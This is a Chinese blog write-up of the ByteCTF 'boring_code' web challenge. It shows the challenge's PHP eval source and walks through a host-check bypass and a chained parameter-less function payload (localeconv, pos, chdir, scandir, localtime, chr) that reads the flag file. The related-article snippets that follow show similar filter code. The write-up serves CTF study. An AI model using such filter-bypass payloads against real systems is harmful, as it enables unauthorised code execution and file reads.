bytectf部分wp

最新推荐文章于 2022-05-15 20:06:13 发布
最新推荐文章于 2022-05-15 20:06:13 发布
阅读量1k 收藏
点赞数
分类专栏: ctf学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/100679006
版权

boring_code

拿到源码

<?php
function is_valid_url($url) {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        if (preg_match('/data:\/\//i', $url)) {
            return false;
        }
        return true;
    }
    return false;
}

if (isset($_POST['url'])){
    $url = $_POST['url'];
    if (is_valid_url($url)) {
        $r = parse_url($url);
        if (preg_match('/baidu\.com$/', $r['host'])) {
            $code = file_get_contents($url);
            if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        } else {
            echo "error: host not allowed";
        }
    } else {
        echo "error: invalid url";
    }
}else{
    highlight_file(__FILE__);
}

我们这里只讨论下怎么绕过正则和这个过滤。

if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }

前面的简单说下,怎么匹配这个百度又不影响后面的file_get_content读取。最开始我们构造了http://baidu.com#@公网ip,但是在到file_get_content的时候,就过不去了,后面又构造0://url;baidu.com畸形的url,也是一样,遇到file_get_content时就过不去了,后来,后来,后来。知道怎么绕过没,直接买一个带有baidu.com的域名直接绕过,像这样一样。在这里插入图片描述

然后说下怎么绕过后面的过滤。
我们先看正则'/[a-z]+\((?R)?\)/'这里只允许执行如下的形式

a(b(c()));
a();

然后这里使用文件读取,读取flag
先构造出一个可以读取文件的payload:

echo(readfile(end(scandir('.'))))

这里可以读取目录的最后一个文件。
但是前面只能执行字母和括号,所以这个**.**必须用函数代替。所以构造一个可以产生.的函数,发现函数localeconv(),执行会返回一个数组,数组的第一项就是.所以用函数current(localeconv())取出第一项。但是上面的nt被ban了,但是我们发现了pos()函数。pos()就是current()函数的别名。
在这里插入图片描述
在这里插入图片描述
于是构造pos(localeconv()).
现在我们的payload为:echo(readfile(end(scandir(pos(localeconv())))))
但是现在我们只是得到了最后一个文件。而flag在上层目录,于是我们要跳转到上层目录。使用chdir()跳转。但是chdir()函数只会返回bool值,我们需要一个函数接受布尔值并且可以输出.
发现了与时间有关的函数time(),localtime()time()是返回时间戳.但是并不能得到想要的.,而localtime()返回的是数组,可以提取秒数的值,后使用chr()转为.即在46s时chr(pos(localtime()))就会返回.
但是localtime()内接受布尔参数会报错。后面发现localtime第一参数默认是time() ,那我可以用localtime接受time函数,time接受一个bool值。
在这里插入图片描述
于是最终的payload构造如下:

echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

后面获取flag的操作就是将文件放到自己的(买的域名)vps上,然后访问,简单爆破下,在时间为46秒时,可以读到flag.

参考:https://altman.vip/2019/09/09/ByteCTF-WEB/

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 886
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
buuctf re部分wp
a3uRa的一个窝
08-29 584
文章目录helloword | easyreverse1reverse2新年快乐 | easyxor | easy内涵的软件 | easyreverse3不一样的flagSimpleRev helloword | easy reverse1 https://www.cnblogs.com/harmonica11/p/11365728.html reverse2 新年快乐 | easy xor | ...
PHP无参数RCE
weixin_43610673的博客
03-14 2827
无参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
代码审计从入门到放弃(三) & phplimit
蚁景网安学院
03-14 1359
前言接着前面的代码审计从入门到放弃(一) & function、代码审计从入门到放弃(二) & pcrewaf本次是phplimit这道题,本篇文章提供了3种解法,即如何...
[原题复现]2019上海大学生WEB-Decade(无参数RCE、Fuzz)
笑花大王
05-16 436
简介 原题复现: 考察知识点:无参数命令执行、Fuzz 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 代码 <?php highlight_file(__FILE__); $code = $_GET['code']; if (!empty($code)) { ...
无参数RCE
sGanYu
10-02 2151
[GXYCTF2019]禁止套娃 <?php include "flag.php";//执行并包含flag.php echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/.
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
Wp.rar_wp
09-14
标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件,后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关,是一种在信号处理领域广泛应用的技术。 在描述中提到...
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
WP7贪吃蛇游戏
04-02
一款非常不错的WP7贪吃蛇游戏源码,也是大家经常玩的一种游戏,该游戏很轻松移植到Windows Phone手机终端上,源码很简单,喜欢的朋友可以下载研究一下。 游戏介绍: 1.一款比较需要耐心的游戏,用上下左右控制蛇的...
PHP无参函数
Flynn的博客
04-18 654
eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); }
使用无参数函数进行命令执行
kali_Ma的博客
01-17 2526
前言 在这里总结一下无参数命令执行。 环境准备 测试代码 <?php highlight_file(__FILE__); if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } ?> 关键代码 preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 这里使用pregreplace替换匹配到的字符为空,\
php 正则替换原理,学习猿地-浅谈php正则替换函数preg_replace的用法
weixin_39576270的博客
03-29 136
PHP preg_replace()实例
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 750
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
[i春秋]Mercy-code
Landasika的博客
05-15 526
Mercy-code(无参REC) 题目源码 <?php highlight_file(__FILE__); if ($_REQUEST['cmd']) { $cmd = $_REQUEST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if(preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|
2022年春秋杯网络安全联赛春季赛 勇者山峰
shinygod的博客
05-08 1354
Mercy-code if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd))这个过滤就代表了是无参rce。 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { echo chr(strrev(un
js--string/正则表达式replace方法详解
weixin_34021089的博客
03-22 158
replace方法是javascript涉及到正则表达式中较为复杂的一个方法,严格上说应该是string对象的方法。只不过牵扯到正则的时候比较多一些。需要我们灵活的使用。 语法: stringObj.replace(regexp/substr,replacement); 第一个参数:必需。字符串中要替换的子串或正则RexExp;第二个参数...
限制操作 killw3wp
最新发布
12-30
killw3wp 是一种用于终止运行中的 w3wp.exe 进程的命令。w3wp.exe 是由 IIS (Internet Information Services) 使用的工作进程进程,它负责处理和执行网站上的请求。无论是在开发环境还是生产环境中,都需要小心操作 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值